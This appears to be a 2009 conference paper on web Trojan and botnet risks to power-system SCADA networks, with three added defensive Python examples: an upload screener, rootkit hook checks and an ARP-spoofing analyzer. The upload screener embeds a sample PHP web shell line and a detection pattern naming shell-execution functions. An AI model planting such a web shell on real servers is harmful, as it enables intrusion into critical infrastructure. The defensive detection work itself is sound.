2009 International Conference on Web Information Systems and Mining

Hacking Risk Analysis of Web Trojan in Electric Power System

Yong Wang 1,2, Dawu Gu 1, Jianping Xu 2, Haizhou Du 2

1. Dept. of Computer Science and Engineering, Shanghai Jiao Tong University, Shanghai, China
2. Dept. of Computer Science and Technology, Shanghai University of Electric Power, Shanghai, China
wy616@126.com

Abstract—The threat from web Trojans to electric power systems (EPS) is complex: a Trojan may infect computers, damage the SCADA system, or even cause an electricity failure. This paper presents the potential Trojan attack risks to an EPS by analyzing the security architecture of power systems, including the firewall, intrusion detection system and intrusion prevention system. It analyzes some possible attack methods used by web Trojans and botnets. In order to find or track possible Trojan attacks, detection and defense methods in a virtual power system environment, such as a web-based SCADA system, a VMware station, a honeynet, anti-Trojan software and operating system security, are presented.

Keywords-power system; security; Trojan; web

I. INTRODUCTION

Power system security is a very important issue. Remote control and electricity transport systems may give hackers opportunities to intrude into the systems through cyberspace. Studies commissioned by the White House, FBI, and North American Electric Reliability Council (NERC) have identified several factors that increase the probability of an electronic, computer-based attack being launched against a substation, causing a regional and possibly widespread power outage [2,3]. The hacking risk from the Internet or on a web server is very large, even though there are many intrusion detection systems and firewalls in power systems.

Once a Trojan or virus from cyberspace damages or changes some parameters of the Supervisory Control and Data Acquisition (SCADA) system, protective functions may trip and the electric power system may suddenly collapse. SCADA vendors do not implement adequate security measures in their products [10]. A power system consists of SCADA, the electric power communication network and the power data network. SCADA is widely used in industrial infrastructures such as railways and the electricity grid, and is managed remotely over communication networks.

A new SCADA system has been designed for the power system of Montenegro with ICCP/TASE.2 and web-based real-time electricity demand metering extensions [11]. IEEE P1547.6 is a draft recommended practice for interconnecting distributed resources with electric power system distribution secondary networks. This standard establishes recommended criteria, requirements and tests, and provides guidance for the interconnection of distribution secondary network types of area electric power systems (AEPS) with distributed resources (DR) providing electric power generation in local electric power systems (Local EPS). Further, this standard identifies communication and control recommendations and provides guidance on considerations that will have to be addressed for such DR interconnections. The network control center in one AEPS domain operates as an administrator of all its local EPS domains and communicates with users in other AEPS domains. The International Electrotechnical Commission (IEC) has recently published a substation automation system communication standard, IEC 61850 [1]. SCADA and AEPS both need computers to control the EPS over different networks. A Trojan can now control remote computers without being detected by anti-virus software or the firewall. Once a Trojan attacks the EPS through cyberspace, the EPS is in great danger. Vulnerability assessment is a requirement of cyber security standards for electric power systems, and the impact of a cyber attack on SCADA systems must be studied [6].

We analyze the potential web Trojan attack risks to the EPS. By analyzing the security architecture of power systems, namely the firewall, intrusion detection system and intrusion prevention system, we identify some possible attack methods used by Trojans and botnets in a virtual power system environment consisting of a web-based SCADA system, a VMware station, a honeynet, anti-Trojan software and operating system security.

II. SECURITY ARCHITECTURE OF POWER SYSTEMS

A. IEEE Standards of Power Systems Security

The IEEE defines electronic intrusions as: "Entry into the substation via telephone lines or other electronic-based media for the manipulation or disturbance of electronic devices. These devices include digital relays, fault recorders, equipment diagnostic packages, automation equipment, computers, programmable logic controllers, and communication interfaces." [1]

The IEEE standard shows that during the operational stage, intrusions can affect the integrity of the electric power supply and the reliability of the transmission and distribution grid if the intrusion results in power interruptions. Examples include projectiles, poles, or kites that come in contact with energized parts, and electronic interference with relaying and control circuits. Intruders have been known to open valves, push buttons, and operate circuit breakers, reclosers and switches [1].

978-0-7695-3817-4/09 $26.00 © 2009 IEEE 510
DOI 10.1109/WISM.2009.109
The IEEE 1547 family of standards gives utilities a technical framework to integrate power from diverse local sources by considering such topics as operation, testing, interconnection, safety, maintenance, interoperability, design, engineering, installation and certification. The IEEE 1547 standards are sponsored by IEEE Standards Coordinating Committee 21 on Fuel Cells, Photovoltaics, Dispersed Generation, and Energy Storage.

IEEE P1547.6, "Recommended Practice for Interconnecting Distributed Resources with Electric Power Systems Distribution Secondary Networks", will overcome this deficiency by recommending technical criteria, requirements and tests relevant to the performance, operation, testing, safety and maintenance of DR interconnected on such networks. It will consider the needs of local and area electric power systems so as to serve owners, operators, manufacturers, system integrators, regulators and other constituencies.

B. Web-based SCADA System

IntegraXor is architected on web technologies: the IntegraXor server is a standards-compliant web server extended with HMI/SCADA functions. A complete IntegraXor system always includes at least one client, which runs in a web browser, either locally or remotely. IntegraXor was developed on open web standards as far as possible, as advocated by the World Wide Web Consortium (W3C), which reduces the learning curve of the system, especially since documentation for non-proprietary technology is widely available. The real-time alarms and event log of the simulated web SCADA system are shown in Figure 1.

Figure 1. Real-time alarms and event log of the simulated web SCADA system.

C. Firewall of Power Systems

The UK government's National Infrastructure Security Co-ordination Centre (NISCC) recently released its guidelines for the effective use of firewalls in SCADA networks (NISCC, 2005) [5]. The firewall of a power system can inspect network communication protocols and detect denial of service (DoS) and other attacks. Several firewall products are used in EPS.

The FortiGate-5000 Series addresses these attacks by tightly integrating multi-threat protection into a purpose-built platform to block today's file-based and network-based threats. Examples of critical threats blocked by the FortiGate include viruses, Trojans, worms, phishing schemes, intrusion attempts, denial of service (DoS) attacks and an ever increasing number of attacks that use blended threat vectors.

The full-feature version of the SunScreen 3.1 firewall is also used in power systems. It is a versatile stateful packet-filtering firewall that is used to control access, authenticate users and encrypt network data, and that operates in either routing or stealth mode. The SunScreen 3.1 installation guide covers an installation overview and considerations, installing in routing mode with local and remote Administration Stations, installing in stealth mode, installing on Trusted Solaris, upgrading from the SunScreen EFS and SPF firewalls, converting from Check Point's FireWall-1, removing the SunScreen software, command-line installation, and upgrading cryptographic modules.

D. Power Intrusion Detection and Intrusion Prevention System

The intrusion detection system (IDS) of a power system can detect virus attacks and malicious code in network communications. Antivirus software can also be installed in the power system's information area.

The British Columbia Institute of Technology (BCIT) is one of a few groups that track industrial cyber security incidents. The BCIT Industrial Security Incident Database (ISID) contains information regarding security-related attacks on process control and industrial networked systems [12].

AVG Anti-Virus SBS protects Microsoft Windows Small Business Server networks. Its functions include protection against viruses, worms and Trojans, against spyware, adware and identity theft, against hidden threats (rootkits), and a Web Shield against malicious websites.

ZoneAlarm Pro provides an advanced firewall with identity and privacy protection against spyware, hackers and identity thieves.

The FortiGuard Antivirus Service prevents both new and evolving virus, spyware and malware threats and vulnerabilities from gaining access to a network and its valuable applications or data assets by preventing and responding to today's fast-spreading attacks. It employs virus, spyware and heuristic detection engines to provide protection against content-level threats.

The FortiGuard Intrusion Prevention Service (IPS) provides alerts based on a customizable database of more than 4000 known attack signatures. This enables FortiGate security systems to stop attacks that evade conventional host-based antivirus systems, and provides an immediate response to fast-spreading threats. Fortinet's worldwide IPS engineering teams "follow the sun", allowing Fortinet to provide customers with real-time attack signatures. Using the global FortiGuard Distribution Network, FortiGate systems stop the most damaging attacks at the network border regardless of whether the network is a wired, wireless, partner extranet or branch office connection. Furthermore, Fortinet's technology also supports behavior-based heuristics, adding recognition capabilities beyond simply matching content against known signatures.
III. POSSIBLE ATTACK METHODS OF POWER SYSTEM

A. Possible Hacking Vulnerabilities of Power Systems

Paul W. Oman and his co-authors have researched power system security, possible attacks from the Internet, and attack and defense tools [2-4]. Portions of this work were funded by the U.S. Department of Commerce National Institute of Standards and Technology Critical Infrastructure Protection Grant. Figure 2 is taken from his paper [4].

Figure 2. Electronic access vulnerabilities [4].

1. Modem access via telecommunications providers.
2. Public network access via the Internet.
3. Wireless network access.
4. Long-run private network lines.
5. Leased network lines (e.g., ATM or Frame-Relay connections) using telecommunications providers. [4]

We focus on electronic access and discuss the anatomy of a cyber attack, such as gaining access to the inside of a substation and changing settings. The web hacking vulnerabilities of power systems are shown in Figure 3.

Figure 3. Web hacking vulnerabilities of power systems.

B. Firewall Hacking by Web Trojan

A firewall is an integrated collection of security measures designed to prevent unauthorized electronic access to a networked computer system, and in particular to prevent unauthorized access to or from a private network. Firewalls can be implemented in hardware, in software, or in a combination of both. They are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets. All messages entering or leaving the intranet pass through the firewall, which examines each message and blocks those that do not meet the specified security criteria.

A Trojan horse at first glance appears to be useful software, but actually does damage once installed or run on the computer. The Bifrost Trojan could already bypass many software firewalls when it first appeared, and its later versions are better at doing so.

A web shell Trojan can hide its server-side component inside a picture file. Once the picture carrying the Trojan has been uploaded to the web server, the attacker can gain administrator privileges by running privilege-escalation tools through it. The web Trojan can then control the web server as if it were the attacker's own computer: downloading files, uploading files, recording passwords and even formatting the server's disk. It can cause serious damage by deleting files and destroying information on the system.

A Trojan inside the local network can download further viruses from the outside web. Once one computer is hacked, all the other computers in the local network face the risk of being hacked.

C. Trojan Methods Against Intrusion Detection Systems

Firewalls work well in conjunction with intrusion detection systems (IDS). As with firewalls, the problem with IDS for SCADA networks is that most commercial IDS are not capable of monitoring SCADA protocols for suspicious behavior (Pollet, 2002; Stamp et al., 2004) [5]. Current IDS technology is not suited to wide deployment inside SCADA environments [6].

A rootkit Trojan can hide its own process by injecting a remote thread into another process, or hook the interrupt descriptor table (IDT) to redirect interrupts. Besides IDT hooking, there are many kernel-mode hooks, such as SYSENTER hooks, system service dispatch table (SSDT) hooks, code patching hooks, layered driver hooks and driver hooks [4]. Kernel-level IDT-hooking Trojans threaten operating system security. Windows Vista has stricter security rules than Windows XP, so many rootkit Trojans cannot work properly on it. That does not mean the system is perfect; it still has many security bugs.

Besides kernel hooks, Trojans use many user-mode hooking techniques, such as Import Address Table (IAT) hooking. When an application uses a function in another binary, the application must import the address of the function. Most applications that use the Win32 API pass through an IAT, so a Trojan can use IAT hooking against them.

Inline function hooking Trojans are much more powerful than IAT hooks: they do not suffer from the problems associated with the binding time of the DLL.

DLL-injecting Trojans are more popular, and can use two methods to inject. Injecting a DLL using Windows hooks: applications receive event messages for many events in the computer that relate to the application, and a hook procedure installed for such events is loaded into the application's process. Injecting a DLL using remote threads: another way to load a rootkit DLL into the target process is to create a remote thread in that process.

We tested several hooking Trojans which work on the Windows Vista operating system, pass through the IDS and control remote computers without being detected by much antivirus software. It seems that a lot remains to be done to enhance the security of the operating system.

D. Distributed Denial of Service Attacks by Botnets

Online criminals can use a virus to take control of large numbers of computers at a time and turn them into "zombies" that work together as a powerful "botnet" to perform malicious tasks. Botnets, which can control huge numbers of zombie computers, can distribute spam e-mail, spread viruses, attack other computers and servers, and commit other kinds of crime and fraud. According to a report from the Russian company Kaspersky Lab, botnets currently pose the biggest threat to the Internet.

The computers that form a botnet can be programmed to redirect transmissions to a specific computer, such as a web site that is shut down by having to handle too much traffic: a distributed denial-of-service (DDoS) attack.

Agobot3 is a modular IRC bot for Win32 or Linux. The Agobot family quickly grew larger than other bot families; other bots in the family are Forbot, Phatbot, Urxbot, Rxbot and Rbot, and Agobot now has several thousand variants. The majority of the development effort behind Agobot targets the Microsoft Windows platform, so the vast majority of the variants are not Linux compatible. In fact, most modern Agobot strains must be built with Visual Studio because of their reliance on the Visual Studio SDK and Processor Pack.

The web server in a power system needs to defend against DDoS attacks. In practice, however, the DDoS risk to a power system is lower than the risk from a single Trojan, because the EPS rejects traffic from any IP range other than its own. That filter does nothing against a host that is already inside the permitted range: an ARP Trojan can damage the whole information network of the power system even though only one computer has been hacked.

IV. DETECTION AND DEFENSE METHODS IN VIRTUAL POWER SYSTEMS

A. Virtual SCADA

With the recent development of industrial computing systems and human-machine interface software packages, power system research and development engineers have seized the opportunity to build virtual simulation tools that emulate the operation of power systems. Reference [9] describes the development of a virtual SCADA (V-SCADA) system that serves as a tool for IDS testing. Reference [8] presents a PC-based simulator for SCADA systems which can be used for the analysis of distribution networks. The system consists of one PC representing the master station, connected through a physical RS-232 link to another PC which represents the RTU network. The master station is equipped with all standard SCADA modules, such as network analysis functions, data acquisition applications, communication protocols and HMI. The RTU station simulates field data acquisition and data transfer to the master station [8].

B. Virtual Intrusion Detection Architecture

Because we cannot test Trojans in the real network of a power system, we had to build a virtual experimental environment. Virtualization is a proven software technology with which the virtual power system can be built.

VMware scales across hundreds of interconnected physical computers and storage devices to form an entire virtual infrastructure. Servers, storage and network bandwidth need not be assigned permanently to each application; instead, hardware resources are dynamically allocated when and where they are needed. The VMware station needs a minimum of two network interface cards, one connected to the internal honeynet network and one connected to the external network or the Internet. A third card is needed for remote management or remote logging, including the use of the Walleye interface.

The Honeynet Project is an international, non-profit research organization dedicated to improving the security of the Internet at no cost to the public. Its Honeywall CDROM is the primary high-interaction tool for capturing, controlling and analyzing attacks. It creates an architecture that allows both low-interaction and high-interaction honeypots to be deployed, but is designed primarily for high interaction. The Honeynet Project's paper "Know Your Enemy: Honeynets" helps the reader become familiar with the concepts of a honeynet, especially the risks and legal issues involved. The Walleye web interface is used to administer the Honeywall: it allows the system to be administered remotely and the data collected by the honeynet during a Trojan intrusion to be analyzed.

C. Iris Packet Capture from the SCADA Network

Iris is a network traffic analyzer from eEye Digital Security, a company committed to bringing visibility and control over computer and application vulnerabilities and to providing a means to mitigate attacks before they compromise sensitive information or critical computing devices.

The tool can capture web SCADA packets from the current network segment, decode many types of trace files containing IP packets, reconstruct TCP sessions and show the e-mails, web pages, FTP sessions and everything else that passes unencrypted through the network. Iris lets the analyst search for particular words across captured sessions (web pages, e-mails, instant messages, etc.).

Iris can also log network-wide foreign connection attempts: it watches over the network and raises an alarm when someone from outside tries to connect to the monitored computers. The details are shown in Figure 4.

Figure 4. Capture packets from SCADA.
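Section III.B above describes a web shell whose server-side part is hidden inside a picture and uploaded to the power system's web server. The checker below is an added example written for this page, not code from the paper or from the IntegraXor server; it shows the three tests an upload handler can run before storing a file: the declared extension must be an accepted image type, the file header must match that type, and the body must not contain server-side script markers. The file names, the JPEG/PNG/GIF magic numbers and the appended PHP payload are constructed for the demonstration.

```python
"""Added example for this page (not code from the paper): screening an uploaded
"picture" for a hidden web shell before the web SCADA server stores it.

Three tests are applied: the extension must be an accepted image type, the file
header must match that type, and the body must not contain server-side script
markers. All file names and byte strings below are constructed for the demo.
"""
import os
import re

# Leading bytes (magic numbers) of the image formats the upload handler accepts.
IMAGE_SIGNATURES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# Script extensions an attacker might smuggle in via a double extension.
SCRIPT_EXTENSIONS = {".php", ".php5", ".phtml", ".asp", ".aspx", ".jsp", ".cgi", ".pl"}

# Markers of server-side code that has no business inside an image. A picture
# that still displays correctly can carry such a payload after the image data;
# it becomes a web shell as soon as the server is tricked into executing it.
SCRIPT_MARKERS = re.compile(
    rb"<\?php|<\?=|<%[@!=]?|<script\b|eval\s*\(|passthru\s*\(|shell_exec\s*\(|system\s*\(|Runtime\.getRuntime",
    re.IGNORECASE,
)


def check_upload(filename: str, data: bytes) -> list:
    """Return a list of findings; an empty list means the file passed every test."""
    findings = []
    base = os.path.basename(filename).lower()
    parts = base.split(".")
    if len(parts) < 2 or not parts[-1]:
        return ["no file extension"]
    ext = "." + parts[-1]

    # shell.php.jpg: some servers select the handler from the first extension
    # they recognize, so the inner extensions must be inspected too.
    inner = {"." + p for p in parts[1:-1]}
    if inner & SCRIPT_EXTENSIONS:
        findings.append("double extension with a script type: " + base)

    sigs = IMAGE_SIGNATURES.get(ext)
    if sigs is None:
        findings.append("extension is not an accepted image type: " + ext)
    elif not any(data.startswith(s) for s in sigs):
        findings.append("file header does not match " + ext)

    m = SCRIPT_MARKERS.search(data)
    if m:
        findings.append("server-side script marker %r at offset %d" % (m.group(0), m.start()))
    return findings


# Constructed samples: a minimal JPEG header, the same header with a PHP web
# shell appended (a polyglot file that image viewers still accept), a
# double-extension name and a text file posing as a PNG.
CLEAN_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32 + b"\xff\xd9"
SHELL_IN_JPEG = CLEAN_JPEG + b"<?php echo shell_exec($_GET['c']); ?>"


def demo() -> dict:
    return {
        "photo.jpg": check_upload("photo.jpg", CLEAN_JPEG),
        "photo2.jpg": check_upload("photo2.jpg", SHELL_IN_JPEG),
        "x.php.jpg": check_upload("x.php.jpg", CLEAN_JPEG),
        "notes.png": check_upload("notes.png", b"hello"),
    }


if __name__ == "__main__":
    for name, found in demo().items():
        print(name, "OK" if not found else "; ".join(found))
```

A passing result is necessary, not sufficient: the marker list only catches known tags, so a production handler should also re-encode the image with an image library, which discards anything appended after the image data, and should store uploads outside any directory the web server is configured to execute.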
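Section III.C above names the hooking techniques a rootkit Trojan uses (IDT, SSDT, IAT and inline hooks, DLL injection), and Section IV.D lists the hiding features a detector must expose (process, file and port hiding) and the memory, file and behavior checks that make up the detection component. The following is an added example written for this page, not code from the paper or from any anti-Trojan product it mentions: three host-side checks that correspond to those techniques, run on constructed data. On a real Windows host the prologue bytes would be read from the live process, the import address table slots parsed from the loaded PE image, and the two process views taken from the documented process API and from a lower-level enumeration; here every address, module name, prologue and PID list is constructed.

```python
"""Added example for this page (not code from the paper): three host-side checks
against the rootkit techniques named in Sections III.C and IV.D, run here on
constructed data.

On a real Windows host the prologue bytes would be read from the live process,
the import address table (IAT) slots would be parsed from the loaded PE image,
and the two process views would come from the documented process API and from
a lower-level enumeration. None of that is performed here; every input below is
constructed to show what each check looks for.
"""
from typing import Dict, List, Optional, Sequence, Tuple


def inline_hook(prologue: bytes) -> Optional[str]:
    """Inline hooks overwrite the first instructions of a function with a
    trampoline into the rootkit. Return the trampoline form found, or None."""
    if len(prologue) >= 5 and prologue[0] == 0xE9:
        return "jmp rel32"
    if len(prologue) >= 6 and prologue[:2] == b"\xff\x25":
        return "jmp [abs32]"
    if len(prologue) >= 6 and prologue[0] == 0x68 and prologue[5] == 0xC3:
        return "push imm32 / ret"
    if len(prologue) >= 7 and prologue[0] == 0xB8 and prologue[5:7] == b"\xff\xe0":
        return "mov eax, imm32 / jmp eax"
    return None


def iat_hooks(modules: Dict[str, Tuple[int, int]],
              iat: Sequence[Tuple[str, str, int]]) -> List[str]:
    """modules maps a loaded DLL name to (base address, image size).
    iat holds (symbol, exporting module, resolved address) for each slot.
    A hooked slot no longer points inside the image of the module that
    exports the symbol; report where it points instead."""
    def owner(addr: int) -> str:
        for name, (base, size) in modules.items():
            if base <= addr < base + size:
                return name
        return "memory outside every listed module"

    findings = []
    for symbol, module, addr in iat:
        if module not in modules:
            findings.append(f"{module}!{symbol}: exporting module is not loaded")
            continue
        if owner(addr) != module:
            findings.append(f"{module}!{symbol} -> 0x{addr:08x} points into {owner(addr)}")
    return findings


def hidden_items(api_view: Sequence[int], raw_view: Sequence[int]) -> List[int]:
    """Cross-view diff. Process or port hiding works by filtering the answer of
    the API that tools query; an independent lower-level enumeration still
    sees the item. Anything in the raw view but not in the API view is hidden."""
    return sorted(set(raw_view) - set(api_view))


# Constructed data. Addresses are illustrative 32-bit values, not real layouts.
MODULES = {
    "kernel32.dll": (0x7C800000, 0xF6000),
    "ntdll.dll": (0x7C900000, 0xB2000),
    "evil.dll": (0x10000000, 0x20000),      # the injected rootkit DLL
}
IAT = [
    ("CreateFileW", "kernel32.dll", 0x7C810CD9),              # intact
    ("NtQuerySystemInformation", "ntdll.dll", 0x10001234),     # redirected into evil.dll
    ("ReadFile", "kernel32.dll", 0x00401000),                  # redirected to unlisted memory
]
CLEAN_PROLOGUE = b"\x8b\xff\x55\x8b\xec"          # mov edi,edi; push ebp; mov ebp,esp
HOOKED_PROLOGUE = b"\xe9\x10\x00\x00\x10"         # jmp rel32 trampoline
API_PIDS = [4, 372, 612, 1480]                    # what the process API returns
RAW_PIDS = [4, 372, 612, 1480, 2204]              # what a raw enumeration returns


def demo() -> dict:
    return {
        "inline_clean": inline_hook(CLEAN_PROLOGUE),
        "inline_hooked": inline_hook(HOOKED_PROLOGUE),
        "iat": iat_hooks(MODULES, IAT),
        "hidden_pids": hidden_items(API_PIDS, RAW_PIDS),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The checks are deliberately independent: an inline hook leaves the IAT intact, an IAT hook leaves prologues intact, and a process hidden by filtering the enumeration API leaves both intact, which is why a scanner built on the architecture of Section IV.D runs memory, file and behavior checks side by side rather than relying on one of them.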
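Sections III.D and IV.C above describe the two events the authors expect a network monitor to catch: an ARP Trojan acting from inside the permitted address range, and a foreign host trying to connect to the SCADA web server. The analyzer below is an added example written for this page, not code from the paper and not a feature of Iris. It decodes raw Ethernet frames, tracks which MAC address answers for each IP in ARP replies so that a second claimant for the gateway raises an alarm, and flags TCP connection attempts whose source lies outside the operator's own range. The frames, MAC addresses, the 10.10.1.0/24 range and the gateway address are all constructed.

```python
"""Added example for this page (not code from the paper, nor a feature of the
Iris tool): a small capture analyzer for the two alarms Sections III.D and IV.C
care about, an ARP Trojan poisoning the gateway entry and a foreign host trying
to connect to the SCADA web server.

Frames are parsed from raw Ethernet bytes, so the same code would run on a pcap
payload; here the capture, addresses and network ranges are all constructed.
"""
import ipaddress
import struct
from collections import defaultdict
from typing import List

ETH_IPV4, ETH_ARP = 0x0800, 0x0806
ARP_REPLY, TCP = 2, 6


def mac(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def ip(s: str) -> bytes:
    return ipaddress.IPv4Address(s).packed


def eth(dst: str, src: str, etype: int, payload: bytes) -> bytes:
    return mac(dst) + mac(src) + struct.pack("!H", etype) + payload


def arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet/IPv4 ARP reply (hardware type 1, op 2) as sent by a real or spoofing host."""
    body = struct.pack("!HHBBH", 1, ETH_IPV4, 6, 4, ARP_REPLY)
    body += mac(sender_mac) + ip(sender_ip) + mac(target_mac) + ip(target_ip)
    return eth(target_mac, sender_mac, ETH_ARP, body)


def tcp_syn(src_mac: str, src_ip: str, dst_mac: str, dst_ip: str, dst_port: int) -> bytes:
    """Minimal IPv4/TCP SYN; checksums are left at zero because the analyzer ignores them."""
    tcp = struct.pack("!HHIIBBHHH", 40000, dst_port, 1, 0, 5 << 4, 0x02, 8192, 0, 0)
    ipv4 = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, TCP, 0,
                       ip(src_ip), ip(dst_ip))
    return eth(dst_mac, src_mac, ETH_IPV4, ipv4 + tcp)


def parse_frame(raw: bytes) -> dict:
    """Decode the fields the analyzer needs from one Ethernet frame."""
    etype = struct.unpack("!H", raw[12:14])[0]
    body = raw[14:]
    if etype == ETH_ARP:
        op = struct.unpack("!H", body[6:8])[0]
        return {"type": "arp", "op": op, "sender_mac": body[8:14].hex(":"),
                "sender_ip": str(ipaddress.IPv4Address(body[14:18]))}
    if etype == ETH_IPV4:
        ihl = (body[0] & 0x0F) * 4
        rec = {"type": "ipv4", "proto": body[9],
               "src_ip": str(ipaddress.IPv4Address(body[12:16])),
               "dst_ip": str(ipaddress.IPv4Address(body[16:20]))}
        if body[9] == TCP:
            seg = body[ihl:]
            rec["dst_port"] = struct.unpack("!H", seg[2:4])[0]
            rec["syn"], rec["ack"] = bool(seg[13] & 0x02), bool(seg[13] & 0x10)
        return rec
    return {"type": "other", "etype": etype}


def analyze(frames: List[bytes], own_network: str, gateway_ip: str) -> List[str]:
    own = ipaddress.IPv4Network(own_network)
    macs_for_ip = defaultdict(set)
    alerts = []
    for n, raw in enumerate(frames):
        f = parse_frame(raw)
        if f["type"] == "arp" and f["op"] == ARP_REPLY:
            # An IP that suddenly answers from a second MAC is being spoofed;
            # the gateway is the usual target because it carries all traffic.
            seen = macs_for_ip[f["sender_ip"]]
            if seen and f["sender_mac"] not in seen:
                who = "gateway " if f["sender_ip"] == gateway_ip else ""
                alerts.append(f"frame {n}: ARP spoofing: {who}{f['sender_ip']} now claimed by "
                              f"{f['sender_mac']}, previously {sorted(seen)}")
            seen.add(f["sender_mac"])
        elif f["type"] == "ipv4" and f.get("syn") and not f.get("ack"):
            # A bare SYN is a connection attempt; flag those from outside our range.
            if ipaddress.IPv4Address(f["src_ip"]) not in own:
                alerts.append(f"frame {n}: foreign connection attempt "
                              f"{f['src_ip']} -> {f['dst_ip']}:{f['dst_port']}")
    return alerts


# Constructed capture on the power system's information network 10.10.1.0/24.
GATEWAY_MAC, GATEWAY_IP = "00:1a:2b:00:00:01", "10.10.1.1"
HMI_MAC, HMI_IP = "00:1a:2b:00:00:10", "10.10.1.10"
ROGUE_MAC = "00:de:ad:be:ef:01"
CAPTURE = [
    arp_reply(GATEWAY_MAC, GATEWAY_IP, HMI_MAC, HMI_IP),             # genuine gateway reply
    tcp_syn(HMI_MAC, HMI_IP, GATEWAY_MAC, "10.10.1.20", 80),         # HMI -> web SCADA, normal
    arp_reply(ROGUE_MAC, GATEWAY_IP, HMI_MAC, HMI_IP),               # ARP Trojan poisons the gateway entry
    tcp_syn(GATEWAY_MAC, "203.0.113.7", HMI_MAC, "10.10.1.20", 80),  # outside host probing the web server
]


def demo() -> List[str]:
    return analyze(CAPTURE, "10.10.1.0/24", GATEWAY_IP)


if __name__ == "__main__":
    print("\n".join(demo()))
```

The address-range filter the paper relies on cannot see a host that is already inside the range, which is exactly the ARP Trojan case; the ARP check covers that gap. Because the parser works from raw frames, a pcap reader can replace the constructed list without changing the analysis.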
D. Web Trojan Hacking Detection

Web Trojan hacking detection for power systems is composed of four components: analysis of the features of the power system's safety devices, analysis of the hiding features of the Trojan, analysis of the intrusion methods of the Trojan, and intrusion detection in the power system.

Power system safety devices have two kinds of features: read features, which carry information from the SCADA system to the outside, and write features, which carry information from the outside into the SCADA system.

The hiding features of a Trojan include process hiding, file hiding, port hiding and so on. The intrusion methods of a Trojan are evasion of antivirus detection and of firewall detection in the power system.

After analyzing these three kinds of features, the last component is intrusion detection, which is composed of memory detection, file detection and behavior detection. The web Trojan hacking detection architecture is shown in Figure 5.

Figure 5. Web Trojan hacking detection of power systems.

V. DISCUSSION

We have analyzed the potential web Trojan attack risks to the EPS by analyzing the security architecture of power systems: the firewall, intrusion detection system and intrusion prevention system. We identified some possible attack methods used by Trojans and botnets in a virtual power system environment consisting of a web-based SCADA system, a VMware station, a honeynet, anti-Trojan software and operating system security.

We tested several hooking Trojans which work on the Windows XP and Vista operating systems, pass through the firewall and control remote computers without being detected by much antivirus software. The Trojan hacking risk exists in power systems, and it seems that a lot remains to be done to enhance the security of power systems.

ACKNOWLEDGMENT

This paper is supported by National Hi-tech Research and Development Project No. 2006AA01Z405, by the Shanghai Postdoctoral Scientific Program (No. 08R214131) and by the Innovation Program of the Shanghai Municipal Education Commission (No. 09YZ346).

REFERENCES

[1] IEEE Power Engineering Society, IEEE Standard 1402-2000: IEEE Guide for Electric Power Substation Physical and Electronic Security, IEEE, New York, NY, April 4, 2000.
[2] Paul Oman, Edmund O. Schweitzer, III, and Jeff Roberts, "Safeguarding IEDs, substations, and SCADA systems against electronic intrusions", pp. 1-18.
[3] Paul W. Oman, Allen D. Risley, Jeff Roberts, and Edmund O. Schweitzer, III, "Attack and defend tools for remotely accessible control and protection equipment in electric power systems", pp. 1-26.
[4] Paul Oman, Edmund O. Schweitzer, III, and Deborah Frincke, "Concerns about intrusions into remotely accessible substation controllers and SCADA systems", pp. 1-16.
[5] Vinay M. Igure, Sean A. Laughter, and Ronald D. Williams, "Security issues in SCADA networks", Computers & Security 25 (2006), pp. 498-506.
[6] Chee-Wooi Ten, Chen-Ching Liu, and G. Manimaran, "Vulnerability assessment of cybersecurity for SCADA systems", IEEE Transactions on Power Systems, vol. 23, no. 4, Nov. 2008, pp. 1836-1846.
[7] J. Verba and M. Milvich, "Idaho National Laboratory supervisory control and data acquisition intrusion detection system (SCADA IDS)", 2008 IEEE Conference on Technologies for Homeland Security, 12-13 May 2008, pp. 469-473.
[8] M. Awad and A. I. Ibrahim, "PC-based SCADA simulator for distribution system analysis", 4th International Conference on Innovations in Information Technology (Innovations '07), 18-20 Nov. 2007, pp. 332-337.
[9] K. W. Darwish, A. R. Al Ali, and R. Dhaouadi, "Virtual SCADA simulation system for power substation", 4th International Conference on Innovations in Information Technology (Innovations '07), 18-20 Nov. 2007, pp. 322-326.
[10] E. Chikuni and M. Dondo, "Investigating the security of electrical power systems SCADA", AFRICON 2007, 26-28 Sept. 2007, pp. 1-7.
[11] B. Stojkovic and M. Vukasovic, "New SCADA system design in the power system of Montenegro - ICCP/TASE.2 and web-based real-time electricity demand metering extensions", 2006 IEEE PES Power Systems Conference and Exposition (PSCE '06), Oct. 29 2006 - Nov. 1 2006, pp. 2194-2199.
[12] A. Creery and E. J. Byres, "Industrial cyber security for power system and SCADA networks", 52nd Annual IEEE IAS Petroleum and Chemical Industry Conference, 12-14 Sept. 2005, pp. 303-309.